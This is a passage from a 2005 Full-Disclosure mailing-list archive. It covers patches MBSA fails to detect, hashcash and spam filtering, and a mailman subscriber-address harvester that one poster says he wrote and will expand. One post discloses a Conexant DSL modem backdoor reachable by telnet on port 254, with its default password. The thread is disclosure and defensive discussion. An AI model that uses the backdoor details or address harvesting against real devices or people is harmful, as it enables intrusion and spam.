affected is not supported by the MBSA or the ODT. We are working to 
resolve this issue in future versions of the MBSA through the Windows 
Update Server infrastructure. In the meantime, the Enterprise Update Scan 
Tool is designed to complement the MBSA and the ODT for security update 
detection. Whenever MBSA or ODT cannot offer detection, we plan to 
release an Enterprise Update Scan Tool."


Joe Granto, Senior Engineer
Intel Engineering, MCI (back in black)
Marimba Jedi
Office: (954)377-5632  VNET: 377-5632
Pager:  (888)500-6340 or [EMAIL PROTECTED]
FAX: (954)377-5793

LINUX is only free if your time is worthless.

"There is no estimated time of resolution."

Fear my three minute POP time-out.

There is no WorldCom, only Zuul.

WorldCom...  it was all a bad dream.

What's $11 billion between friends?

Complete : having all necessary parts, elements, or steps

Sprint, BP, WorldCom, Qwest, Verizon..  someone make the pain stop.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

[Harshad]

KB887742 and KB886185 are not security updates they are just patchesthats the reason they are not detected by MBSA
Regards,
Harshad.
http://www.securityalertz.com

		Do you Yahoo!? 
Yahoo! Search presents - Jib Jab's 'Second Term'___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

[Thor \(Hammer of God\)]

Actually, the KB article is incorrect.  Only other users from the same 
dial-up ISP given IP's considered in the same "local" subnet would be able 
to have NBT traffic considered local and thus pass through the firewall.  It 
is not "anyone on the Internet" as the KB states.  They would still need a 
username and password to access the resource.  Additionally, one should note 
that on non-domain member systems, administrators would have to explicitly 
allow FPS exceptions after the fact for this to be an issue in the first 
place, and even so, only after going in and manually binding FPS to the 
dial-up interface which is disabled by default.  You really have to go 
around your gluteus maximus to present this as an issue.  So, IMO, it is not 
a major security hole.

The Invalid_Process_Attach_Attempt bug does not have security implications, 
though in particular configurations a DOS does condition exists.  DOS != 
security vulnerability in this case.

But, not withstanding the above caveats, I agree with you that 886185 is 
still a potential security issue, and for that reason, should be checked by 
MBSA.

T
- Original Message - 
From: "Randal, Phil" <[EMAIL PROTECTED]>
To: "BuqtraqNT (E-mail)" <[EMAIL PROTECTED]>; 
"BugtraqSecurity (E-mail)" ; "Full-Disclosure 
(E-mail)" 
Sent: Tuesday, February 15, 2005 2:09 AM
Subject: RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer not 
seeing KB887742 and KB886185


KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".
That's a denial of service.  There are security implications there.
KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."
That looks like a major security hole to me.
Cheers,
Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf
Of Threlkeld, Richard
Sent: 15 February 2005 00:19
To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail);
Full-Disclosure (E-mail)
Subject: [Full-Disclosure] RE: Microsoft Baseline Security
Analyzer not seeing KB887742 and KB886185
These are not security updates.  KB887742 is for a stop error
(http://support.microsoft.com/kb/887742) and  KB886185 is an
update for network scope on the Windows Firewall
(http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .
The MBSA scans for Security Updates only, not every hotfix
ever released.  Note that a "Critical" patch is not
necessarily a "Security"
patch.  You may be thinking of the "Maximum severity" levels
of the MS*-xxx security bulletins which are not the same thing.
Best,
Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/

-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED]
Sent: Monday, February 14, 2005 10:24 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
KB886185
Subject line says it alljust did a fresh install of WinXP
SP2was using MBSAFU to make sure it would patch...which
it did.  However Windows Update shows still needing KB887742
and KB886185.  MBSA shows no critical patches need updated.
Systeminfo shows that both KB887742 and
KB886185 are NOT installed.  I'm using latest MBSA.  Anyone
else see this?  Kinda sucks :(
James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

[Threlkeld, Richard]

I don't dispute that there are security concerns there however the tool
in question, the MBSA, was designed for a specific purpose which the
original poster doesn't seem to understand.  The breadth of Windows is
quite large and as such the amount of bugs possible are large being
security related or not.  If you were to classify every DoS as a
security implication that needed to be scanned by the MBSA it would take
hours to scan a single system and compare its patch level against every
hotfix released for an OS.

On top of that though the MBSA does do a good job at scanning for common
security misconfigurations on a Windows system such as weak
Administrator passwords, auditing, and some other general Windows
vulnerabilities.  MS also has some great scripts for the utility located
off of the MBSA homepage which concatenate the data and roll it up into
nice reports.  But to say that any BSOD is a DoS and expecting a tool
such as the MBSA to scan against a database containing every hotfix for
a BSOD is a bit unreasonable IMO.  The MSSECURE.XML is large enough as
it is, I couldn't imagine the size of an update catalog for every hotfix
for BSOD's that MS releases (although I suppose you could do it and have
/HF just scan for MSxx-xxx updates and another switch for scanning
against a different XML file containing every hotfix with the caveat
that the scan would take longer).  If I were to really criticize
anything it would be the performance of the MBSA which is sub par at
best.

This really is just a case of understanding what a specific tool is
designed to do and what it is not designed to do.  And being that it's a
free tool which when it has had detection issues over the past 6 month's
MS has created additional scanning tools to fill in the gaps and not
leave their customers high and dry, I'd find it hard to criticize them
that much.

Best,

Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/



-Original Message-
From: Randal, Phil [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, February 15, 2005 2:09 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer
not seeing KB887742 and KB886185

KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".

That's a denial of service.  There are security implications there.

KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."

That looks like a major security hole to me.

Cheers,

Phil


Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Threlkeld, Richard
> Sent: 15 February 2005 00:19
> To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail); 
> Full-Disclosure (E-mail)
> Subject: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer 
> not seeing KB887742 and KB886185
> 
> These are not security updates.  KB887742 is for a stop error
> (http://support.microsoft.com/kb/887742) and  KB886185 is an update 
> for network scope on the Windows Firewall
> (http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .
> 
> The MBSA scans for Security Updates only, not every hotfix ever 
> released.  Note that a "Critical" patch is not necessarily a 
> "Security"
> patch.  You may be thinking of the "Maximum severity" levels of the 
> MS*-xxx security bulletins which are not the same thing.
> 
> Best,
> 
> Richard Threlkeld
> Microsoft MVP - SMS
> http://myitforum.techtarget.com/blog/rthrelkeld/
> 
> 
> 
> -Original Message-
> From: James Lay [mailto:[EMAIL PROTECTED]
> Sent: Monday, February 14, 2005 10:24 AM
> To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
> (E-mail)
> Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
> KB886185
> 
> Subject line says it alljust did a fresh install of WinXP 
> SP2was using MBSAFU to make sure it would patch...which it did.  
> However Windows Update shows still needing KB887742 and KB886185.  
> MBSA shows no critical patches need updated.
> Systeminfo shows that both KB887742 and
> KB886185 are NOT installed.  I'm using latest MBSA.  Anyone else see 
> this?  Kinda sucks :(
> 
> James Lay
> Network Manager/Security Officer
> AmeriBen Solutions/IEC Group
> Deo Gloria!!!
&g

Re: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer no t seeing KB887742 and KB886185

[Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]]

Ping Microsoft.. they were not classified as Security patches [not 
assigned 05-### numbers ergo they aren't on MBSA]

As Richard stated, they aren't security bulletins.
Heck I'd LOVE to get 835734 for the SBS 2003 platform merely on Windows 
Update and honestly I can't wait for WUS or whatever.  Right now there 
are tons of unpatched SBS boxes that are spam machines.  
http://www.sbslinks.com/popconnector.htm

I know at least 886185 is on Windows update so count your blessings.
Randal, Phil wrote:
KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".
That's a denial of service.  There are security implications there.
KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."
That looks like a major security hole to me.
Cheers,
Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

 

-Original Message-
From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf 
Of Threlkeld, Richard
Sent: 15 February 2005 00:19
To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail); 
Full-Disclosure (E-mail)
Subject: [Full-Disclosure] RE: Microsoft Baseline Security 
Analyzer not seeing KB887742 and KB886185

These are not security updates.  KB887742 is for a stop error
(http://support.microsoft.com/kb/887742) and  KB886185 is an 
update for network scope on the Windows Firewall
(http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .

The MBSA scans for Security Updates only, not every hotfix 
ever released.  Note that a "Critical" patch is not 
necessarily a "Security"
patch.  You may be thinking of the "Maximum severity" levels 
of the MS*-xxx security bulletins which are not the same thing.

Best,
Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/

-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED]
Sent: Monday, February 14, 2005 10:24 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
KB886185
Subject line says it alljust did a fresh install of WinXP 
SP2was using MBSAFU to make sure it would patch...which 
it did.  However Windows Update shows still needing KB887742 
and KB886185.  MBSA shows no critical patches need updated.  
Systeminfo shows that both KB887742 and
KB886185 are NOT installed.  I'm using latest MBSA.  Anyone 
else see this?  Kinda sucks :(

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
   

 

--
An open letter to the Security Community:: 
http://msmvps.com/bradley/archive/2004/12/12/23540.aspx

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] RE: Microsoft Baseline Security Analyzer no t seeing KB887742 and KB886185

[Randal, Phil]

KB887742: "A computer that is running Microsoft Windows XP Service Pack
2 (SP2), Microsoft Windows XP Tablet PC Edition 2005, or Microsoft
Windows Server 2003 unexpectedly stops. Additionally, the following Stop
error message appears on a blue screen: Stop 0x05
(INVALID_PROCESS_ATTACH_ATTEMPT)".

That's a denial of service.  There are security implications there.

KB886185: "After you set up Windows Firewall in Microsoft Windows XP
Service Pack 2 (SP2), you may discover that anyone on the Internet can
access resources on your computer when you use a dial-up connection to
connect to the Internet."

That looks like a major security hole to me.

Cheers,

Phil


Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Threlkeld, Richard
> Sent: 15 February 2005 00:19
> To: James Lay; BuqtraqNT (E-mail); BugtraqSecurity (E-mail); 
> Full-Disclosure (E-mail)
> Subject: [Full-Disclosure] RE: Microsoft Baseline Security 
> Analyzer not seeing KB887742 and KB886185
> 
> These are not security updates.  KB887742 is for a stop error
> (http://support.microsoft.com/kb/887742) and  KB886185 is an 
> update for network scope on the Windows Firewall
> (http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .
> 
> The MBSA scans for Security Updates only, not every hotfix 
> ever released.  Note that a "Critical" patch is not 
> necessarily a "Security"
> patch.  You may be thinking of the "Maximum severity" levels 
> of the MS*-xxx security bulletins which are not the same thing.
> 
> Best,
> 
> Richard Threlkeld
> Microsoft MVP - SMS
> http://myitforum.techtarget.com/blog/rthrelkeld/
> 
> 
> 
> -Original Message-
> From: James Lay [mailto:[EMAIL PROTECTED]
> Sent: Monday, February 14, 2005 10:24 AM
> To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
> (E-mail)
> Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
> KB886185
> 
> Subject line says it alljust did a fresh install of WinXP 
> SP2was using MBSAFU to make sure it would patch...which 
> it did.  However Windows Update shows still needing KB887742 
> and KB886185.  MBSA shows no critical patches need updated.  
> Systeminfo shows that both KB887742 and
> KB886185 are NOT installed.  I'm using latest MBSA.  Anyone 
> else see this?  Kinda sucks :(
> 
> James Lay
> Network Manager/Security Officer
> AmeriBen Solutions/IEC Group
> Deo Gloria!!!
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

[STANESCU Ionut]

Hi James, 

I have the same problem, also anothers.The command line mbsacli has different 
functionality problems.To resolve this problem I use GFI Lan Guard Scanner 
6.0.Until now it resolve patch problems(detection and distributions of these). 

Regards,


Ionut Stanescu
BRD - Groupe Société Générale 
Departamentul Sisteme Informatice / Directia Sisteme si Retele / Sisteme de 
Operare
(DSI/DSR/SSO)


-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED] 
Sent: Monday, February 14, 2005 8:24 PM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure (E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

Subject line says it alljust did a fresh install of WinXP SP2was using 
MBSAFU to make sure it would patch...which it did.  However Windows Update 
shows still needing KB887742 and KB886185.  MBSA shows no critical patches need 
updated.  Systeminfo shows that both KB887742 and KB886185 are NOT installed.  
I'm using latest MBSA.  Anyone else see this?  Kinda sucks :(

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: [Mailman-Developers] mailman emailharvester

[Aditya Deshmukh]

> But cutting off 82% even
>before the DATA command is not too shabby. OTOH it is a sign on how bad
>mail has become if more than 80% are plain junk even without looking at
>the content.

Amd it is going to get worse from here!



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185

[Threlkeld, Richard]

These are not security updates.  KB887742 is for a stop error
(http://support.microsoft.com/kb/887742) and  KB886185 is an update for
network scope on the Windows Firewall
(http://support.microsoft.com/default.aspx?scid=kb;en-us;886185) .

The MBSA scans for Security Updates only, not every hotfix ever
released.  Note that a "Critical" patch is not necessarily a "Security"
patch.  You may be thinking of the "Maximum severity" levels of the
MS*-xxx security bulletins which are not the same thing.

Best,

Richard Threlkeld
Microsoft MVP - SMS
http://myitforum.techtarget.com/blog/rthrelkeld/



-Original Message-
From: James Lay [mailto:[EMAIL PROTECTED] 
Sent: Monday, February 14, 2005 10:24 AM
To: BuqtraqNT (E-mail); BugtraqSecurity (E-mail); Full-Disclosure
(E-mail)
Subject: Microsoft Baseline Security Analyzer not seeing KB887742 and
KB886185

Subject line says it alljust did a fresh install of WinXP SP2was
using MBSAFU to make sure it would patch...which it did.  However
Windows Update shows still needing KB887742 and KB886185.  MBSA shows no
critical patches need updated.  Systeminfo shows that both KB887742 and
KB886185 are NOT installed.  I'm using latest MBSA.  Anyone else see
this?  Kinda sucks :(

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Deo Gloria!!!


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: GREENAPPLE Release - (OFFTOPIC - sorry).

[Ken Dyke]

On Sun, Feb 13, 2005 at 06:44:53PM -0500, pretty vacant ([EMAIL PROTECTED]) 
wrote:
> Perhaps you'd like to automate that email with a discriptive, static
> subject people can filter. Or better yet, maybe someone should start a
> Kurt Seifried moderated subset of this list. Yeah, that's an idea.

Or instead of cluttering up the subject line people who do not know how
to filter can do themselves a favor and learn.
-- 
Chief Gadgeteer
Elegant Innovations
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [Mailman-Developers] mailman emailharvester

[Volker Tanger]

Greetings!

On Sun, 13 Feb 2005 15:31:53 +0530
"Aditya Deshmukh" <[EMAIL PROTECTED]>
wrote:
>
> 1. postfix will reject 90% of the spam during the initial handshake
> stage - by using a variety of dns / mx resolution tricks 
> 2. clamav and spam assassin integrate into postfix so that you don't
> have to accept the spam the server can even issue a 550 in the middle
> of the data stage
> 3. using some known blacklists like spamhaus and rbl will cut down
> spam to 99.9 % 

Well, my current stats say:

User unknown:   25 %
RBL-blocked:32 %
keyword blocked: 1 %
other blocked:  24 %
locally delivered:  17 %

So a "cut down to 99.9%" is a bit pessimistic (filtering only 0.1% out)
- if you meant "cut by 99.9%" too optimistic. But cutting off 82% even
before the DATA command is not too shabby. OTOH it is a sign on how bad
mail has become if more than 80% are plain junk even without looking at
the content.

Bye
Volker

-- 

Volker Tangerhttp://www.wyae.de/volker.tanger/
--
[EMAIL PROTECTED]PGP Fingerprint
378A 7DA7 4F20 C2F3 5BCC  8340 7424 6122 BB83 B8CB
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: [Mailman-Developers] mailman emailharvester

[Aditya Deshmukh]

>Hashcash isn't even a tiny speed bump if you're a spammer and 
>have 50,000
>zombies - each one only takes a 5 second hiccup and continues 
>spamming

Hashcash and other systems that rely on some sort of check summing is going
to cause problems and hence their adoption is always going to be under a
cloud !

For me the best possible thing to do is to put up a openbsd server with
postfix / clam av / spam assassin / amavaris combo

1. postfix will reject 90% of the spam during the initial handshake stage -
by using a variety of dns / mx resolution tricks 
2. clamav and spam assassin integrate into postfix so that you don't have to
accept the spam the server can even issue a 550 in the middle of the data
stage
3. using some known blacklists like spamhaus and rbl will cut down spam to
99.9 % 


With a combo of all this : no spam - we do not have to worry about our
address being leaked.




Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: mailman email harvester

[Valdis . Kletnieks]

On Sat, 12 Feb 2005 13:11:41 +0100, Bernhard Kuemel said:

> If a user choses to use hashcash he must understand it. If he
> doesn't and subscribes to a mailing list all the list mail will go
> to his spam folder. He will learn from that and whitelist list mail.

Given the number of people who can't even learn "don't open the spam" and
"Don't click on the spyware links", I doubt enough users will both choose
and do it right to make a difference.

> | And remember that the whole *idea*
> | of hashcash is that you make it impractical for somebody to send
> 3,000 pieces
> | of mail.  I'm sure netsys.com wouldn't want to keep
> full-disclosure if they had
> | to do hashcash for even 10% of their users.
> 
> They would not hashcash every mail, but sign each incoming mail so
> spammers can't spam suscribers whose addresses then can be published
> again.

You missed the point - if a user forgets to whitelist netsys.com, then
*NETSYS.COM* has to do a hashcash to deliver the *outbound* mail to the
bozo's ISP.


> Subscribing to mailing lists has always been a process of following
> instructions. If you subscribe via a web page, this web page will
> tell you which addresses to whitelist. If you subscribe via email
> firstly there will also be some source of instructions how to
> subscribe, and secondly you can whitelist replies that reference
> (private) emails you sent recently.

You'd be surprised how many people get it wrong *now*, when the instructions
onlu say "send mail to *this* address with *this* in it'.  I've seen people
manage to get it wrong even when they have a link that says

mailto:[EMAIL PROTECTED]&body=subscribe listname

If you just say "and remember to whitelist [EMAIL PROTECTED]" they won't know 
how/
And if you try to give directions, you'll have to have AOL instrucitons, and
Hotmail instructions, and Yahoo instructions, and GMail instructions, and at
least some of the Hotmail users will try to follow the Yahoo instructions just
because they're total yahoos as well as being hotmail subscribers..


> | There's also all the stuff that things like amazon, ebay, your bank,
> | your insurance company, your utility companies, etc... all send out,
> | that users will forget to whitelist.
> 
> They can send hashcashed requests for being whitelisted which will
> pop up a window similar to message receipt requests.

And the spammers can send hashcashed requests too - remember they have thousands
of zombies, so it doesn't bother them...

> I don't understand the situation. Human edited mail is usually
> created on a workstation that is capable of making hashcash while
> the mail is edited.

You missed a point here.  If I'm composing on a workstation, you *DONT*
want me to do a hashcash *THEN* - because if I'm a spammer, I can do the
hashcash ONCE, and send it to 75 different mailservers, and they'll never
know.

What ends up happening is the user composes it, hits "send", it goes to their
ISP's mail hub - and when the 75 copies go out, the mail hub has to do a
different hashcash for each of the 75 destinations that ask for a hashcash.

That's why hashcash is painful to mail hubs.

> Configure your system to require more. 1 minute. Or 10. Or 20. The
> amount of hashcash can be put in an email address comment or if
> insufficient cash is sent, the receiving system can automatically
> request more.

Remember that you have to pick a number that a legitimate ISP can calculate
a fair number of them a day - if you're cranking a million e-mails a day,
which even a fairly small site like ours manages to do, and only 1% of the
mail needs to be hash-cashed for one CPU minute, suddenly you need 6 CPUs
doing nothing but grinding hashcash.

On the other hand, if you're a spammer with 10K zombies, requiring a minute
of hashcash still means you can send 1.4M spam per day, using other people's
CPU.



pgpIUKuoDhbqx.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [Mailman-Developers] mailman email harvester

[Valdis . Kletnieks]

On Sat, 12 Feb 2005 02:48:56 +0100, Bernhard Kuemel said:

> If hashcash (http://www.hashcash.org/) gets integrated in our mail
> systems we no longer need to hide or obfuscate our email addresses.

And I overlooked the most fatal flaw in hashcash:

Hashcash really sucks if you're a mail server admin who has to crank 50,000
hash cashes a day at 5 CPU seconds a pop because people forgot to whitelist
your server.

Hashcash isn't even a tiny speed bump if you're a spammer and have 50,000
zombies - each one only takes a 5 second hiccup and continues spamming


pgp6wNvzn7kME.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: [Mailman-Developers] mailman email harvester

[Valdis . Kletnieks]

On Sat, 12 Feb 2005 02:48:56 +0100, Bernhard Kuemel said:

> If hashcash (http://www.hashcash.org/) gets integrated in our mail
> systems we no longer need to hide or obfuscate our email addresses.

On the other hand, widespread distribution of hashcash will probably mean
the end of many mailing lists, because you can't trust users to actually
whitelist everything they subscribe to.  And remember that the whole *idea*
of hashcash is that you make it impractical for somebody to send 3,000 pieces
of mail.  I'm sure netsys.com wouldn't want to keep full-disclosure if they had
to do hashcash for even 10% of their users.

I'll go out on a limb and predict that if hashcash catches on, most major
mailing list packages will quickly acquire features to auto-unsub and
auto-blacklist all addresses from domains that present a hashcash challenge,
just out of self-defense. (And yes, unsub and blacklist *the entire domain* -
if foo.com is bouncing mail that hasn't been whitelisted, you have to
ban foo.com from all your lists.  Otherwise you can be DoS'ed (either
intentionally or accidentally) by simply subscribing 15 or 20 addresses
and "forgetting" to whitelist the mailing list...

I'll overlook the issues caused when you *dont know* what to whitelist.
For instance - many mailing lists (including this one) have a "confirmation
of subscription" check.  For bonus points - should you have whitelisted:

a) full-disclosure@lists.netsys.com(the actual list name)
b) [EMAIL PROTECTED] (the rfc822 header on my confirm)
c) [EMAIL PROTECTED] (the rfc821 MAIL FROM:)
d) mailman@
e) majordomo@
f) listserv@

(One or more answers may or may not be correct.  Remember that at the time
you send your subscription request, you probably have not actually seen any
mail from the site, so you can't say "whitelist the address this mail came 
from"...)

There's also all the stuff that things like amazon, ebay, your bank,
your insurance company, your utility companies, etc... all send out,
that users will forget to whitelist.

But yeah, other than all those minor details, hashcash is a fine solution. ;)


pgpeVFh6FWFbu.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: [Mailman-Developers] mailman email harvester

[Bernhard Kuemel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Thomas Hochstein wrote:
|> Given the risk, now made worse by Bernhard's very helpfully
|> distributing this script for spammers, this is a really urgent
|> issue.
|
| Since it is known for many *years* that spammers are harvesting
| addresses from ML-archives, and since anybody can see that
| replacing "at" with "@" is ... not a very hard task, I fail to
| see any urgency here (or any problem in the very simple script
| Berhard distributed).
There may be no urgency but something should be done. Obviously
there is a problem (as can also be seen by the emotions). Since the
only solution we found for now is not to publish the email
addresses, we should do that.
I pointed this out over a year ago and the number of vulnerable
lists only grew. Probably because being able to see who else is on
the list is a nice feature which we don't want to give up. We
repress  the problem: We think, spammers don't exploit it because
they find enough addresses elsewhere. But spammers are smart: They
play a lot of tricks to pass spam filters, they defeat graphical
turing tests to semiautomatically sign up email accounts which the
use for spamming, they make worms which act as mail relays.
They probably already harvest mailing list subscriber addresses and
if they don't do so by now, they sure will, sooner or later. But
they would be fools to tell us about it. We would lock our email
addresses away from them.
I am writing the exploit code not for the spammers. They may already
have one. I'm writing it to wake us up and treat this problem properly.
Brad Knowles wrote:
|> However, still many lists either have the member list openly
|> published, or available to the list members.
|
| True enough.  However, even if we changed the default in Mailman
| to be accessible only to the list administrator, it would take a
| very, very long time before 50% of all Mailman installations were
| secured in this manner.
I hope my exploit code will speed this up. I plan to release the
improved version, which harvests addresses restricted to subscribers
of about 100.000 mailing lists in several (3-6) months.
| That said, changing the default is probably the right thing to
| do.
Please include a note of the upcoming exploit. The current exploit
harvests about 600 lists where the addresses are published unrestricted.
| Moreover, it would be trivially easy for spammers to subscribe to
| the list and silently collect all address information that comes
| across.
|
| There's enough schemes out there for finding addresses that no
| one simple scheme is going to work, and the methods that we know
| will work are going to take a long time to become the default
| standard.
If hashcash (http://www.hashcash.org/) gets integrated in our mail
systems we no longer need to hide or obfuscate our email addresses.
Bernhard
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org
iD8DBQFCDWCH9zL78+QhnUgRAhSfAJ9WpPLARJ4bTG6ZPGH7anxc4FA5YwCdGn0C
nwSeZoHoitZKRA+6rE1hlFU=
=lM5z
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Nice call to ebx found

[class 101]

Yes this if for win2k's OS of course , XP and 2k3 
anyway uses stack protection wich decrease the use of such offsets.
 
-class101Jr. 
ResearcherHat-Squad.com-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: yet another DSL modem backdoor - Mentor (Conexant)

[Philip Barnham]

the latest firmware fixes this issue, however manufacturers are still 
selling these items with non-updated firmware.

i always recommend anyone who buys one of these connexant based routers to 
upgrade the firmware, which a bootable upgrade cd can be downloaded from 
www.origo-repair.org.uk

- Original Message - 
From: "Adam Laurie" <[EMAIL PROTECTED]>
To: "bugtraq" ; "full disclosure" 

Sent: Wednesday, February 09, 2005 6:58 PM
Subject: yet another DSL modem backdoor - Mentor (Conexant)


Amazingly, despite numerous reports of backdoors in these Conexant DSL 
routers, they are *still* being shipped with the port 254 backdoor menu 
enabled...

I've just switched ADSL provider, and the new modem they sent me was a 
"Mentor MR4C/UK". It appears to be another conexant clone, and if you 
telnet to port 254 you get the familiar:

01/01/99   CONEXANT SYSTEMS, INC. 00:00:38
 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.27
and options to set password, reset router to default values, etc. etc. As 
before, you cannot change the login password on this interface, which is, 
in this case, "conexant".

Although this fault and the fix have been posted before, I report this as 
a reminder, and a nag to those feeble manufacturers that haven't got their 
act together...

To work around, set up virtual servers that send the port to a black hole.
If your ISP has shipped you one of these, *TELL* them! Maybe they have 
enough purchasing power to get it sorted...

cheers,
Adam
--
Adam Laurie Tel: +44 (20) 7605 7000
The Bunker Secure Hosting Ltd.  Fax: +44 (20) 7605 7099
Shepherds Building  http://www.thebunker.net
Rockley Road
London W14 0DA  mailto:[EMAIL PROTECTED]
UNITED KINGDOM  PGP key on keyservers
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Re: mailman email harvester

[Dave Korn]

"James Longstreet" wrote in message
news:[EMAIL PROTECTED]
> On Tue, 8 Feb 2005, Dave Korn wrote:
>
